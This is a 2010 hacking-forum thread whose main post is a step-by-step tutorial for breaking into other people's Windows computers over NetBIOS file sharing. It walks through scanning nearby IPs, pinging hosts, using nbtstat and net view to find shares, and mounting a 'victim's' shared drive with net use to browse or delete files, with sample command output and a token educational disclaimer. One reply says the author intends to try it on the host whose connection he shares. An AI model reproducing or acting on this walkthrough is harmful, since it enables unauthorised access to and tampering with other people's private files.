Statua
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Welcome To Statua. Feel free to message any of our staff.

HomeLatest imagesSearchRegisterLog in

Net Bios Exploit

Go down 
3 posters
AuthorMessage
-Chosen-
-Chosen-

Rep : 3

Net Bios Exploit  Empty
PostSubject: Net Bios Exploit    Net Bios Exploit  Icon_minitimeSat Jul 03, 2010 10:24 pm

:::::::::::::::::::::::::::This is a tutorial on how to break into a computer using NetBios:::::::::::::::::::::::::::::::::::

Disclaimer: I am not responsible for any damage you cause using this information. This tutorial was strictly designed for educational purposes, use it at you own will and risk. Compromise of personal information and abuse of a system is punishable by law.

Have you ever wondered how to hack into someones computer and viewing their files. Well in this tutorial I will show you just that. The first thing you will need is a Port Scanner. If you don't have one get one here. Now what you want to do is scan for your surrounding IP addresses that can be picked up by the Scanner. Once you have a list of the the IP adresses to the host, go to Command Prompt and type " Ping -a IpAdress " without quotes. Now replace the IpAddress in the command line with the IP address of the host you are trying to access. Now you in the Command Prompt, you should see something that looks like this:

Reply from xx.xx.xx.xx: bytes=32 time<1ms TTL=128
Reply from xx.xx.xx.xx.: bytes=32 time<1ms TTL=128
Reply from xx.xx.xx.xx: bytes=32 time<1ms TTL=128

Ping statistics for xx.xx.xx.xx:
Packets: Sent = 4, Received = 4, Lost = 0 ( 0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

where the xx.xx.xx.xx is the IP Adress of the host. This means that the host you are trying to access could be potentially prone to be hacked through their NetBios. If you get " Request timed out " this means you are going to have to look for another host. Once you get a valid IP Adress and a host that can be Pinged, you can move one to the next step. Now its time to check out how to see if they have file sharing enabled. To do this type " nbtstat -a xx.xx.xx.xx ". This command line will tell you if they are sharing files. You should get something similar to this:

Name Type Status
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = 00-02-44-14-23-E6

Now the number <20> shows that in this machine has File and Printer Sharing enabled which is good. If you don't get the number <20> this means that the host doesn't not have file sharing enabled and you'll get an error saying "Host Not Found".
For the next step I will show you how to check what the host is actually sharing through his computer. To do this type this command line " net view \\xx.xx.xx.xx ". When this is done successfully you should get something similar to this:

Share name Type Used as Comment
-----------------------------------------------------------------------------------------------------
Printer3 Print Epson Stylus COLOR 440 ESC/P 2
SharedDocs Disk
The command completed successfully

From this we can see that the victim is sharing a Disk named SharedDocs and is also sharing a Printer named Printer3.
Now this is where you can access the shared documents remotely without having to get physical access to the computer. In Command Prompt type " net use K: \\xx.xx.xx.xx.\SharedFile ". In this command line the K represents the letter drive you will be creating to access their shared files, this letter can be changed to whatever you like. Replace the SharedFile with the files the the victim is sharing. For example:

net use K: \\10.0.25.168\SharedDocs

Everything under the Share name has to be copied exactly because it is space and case sensitive. The 10.0.25.168 is the IP address I choose for this example. After this is successful you should get something that says " The command was completed successfully ". When this is done, go to My Computer and you'll see the the victims shared documents and by clicking on it you can view whatever they have on that file and you can delete things (don't get in trouble). There is a way to have full control of a computer using this method so use it carefully.

Stay out of trouble and out of jail, good luck.

-Chosen-
Back to top Go down
mistermostwanted

Net Bios Exploit  Empty
PostSubject: Hey brother   Net Bios Exploit  Icon_minitimeSun Jul 04, 2010 8:21 am

Hey bro Very Happy
Nice color combination and well explained tutorial. I m currently using an internet shared by a host so this will be very much useful for me.i m having some problems with my laptop. As soon as i will fix it i will try this.
thnx for sharing
Keep going cheers
Back to top Go down
alex
Admin
Admin
alex

Rep : 2

Net Bios Exploit  Empty
PostSubject: Re: Net Bios Exploit    Net Bios Exploit  Icon_minitimeSun Jul 04, 2010 3:14 pm

nbstat is not a recognised command for me.... any clues?
Jeez nevermind hada special moment and made a spelling error. -.-

Last edited by alex on Mon Jul 05, 2010 1:25 am; edited 2 times in total
Back to top Go down
http://statua.co.cc
-Chosen-
-Chosen-

Net Bios Exploit  Empty
PostSubject: Re: Net Bios Exploit    Net Bios Exploit  Icon_minitimeSun Jul 04, 2010 6:49 pm

lol! I know what you mean, happened to me before lol

But it is a command if its not then you would have to download the executable for it and put it in system32 and youll be fine lol

-Chosen-
Back to top Go down
Sponsored content

Net Bios Exploit  Empty
PostSubject: Re: Net Bios Exploit    Net Bios Exploit  Icon_minitime

Back to top Go down

Net Bios Exploit
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Statua :: Hacking :: Intermediate Hacking-
Jump to: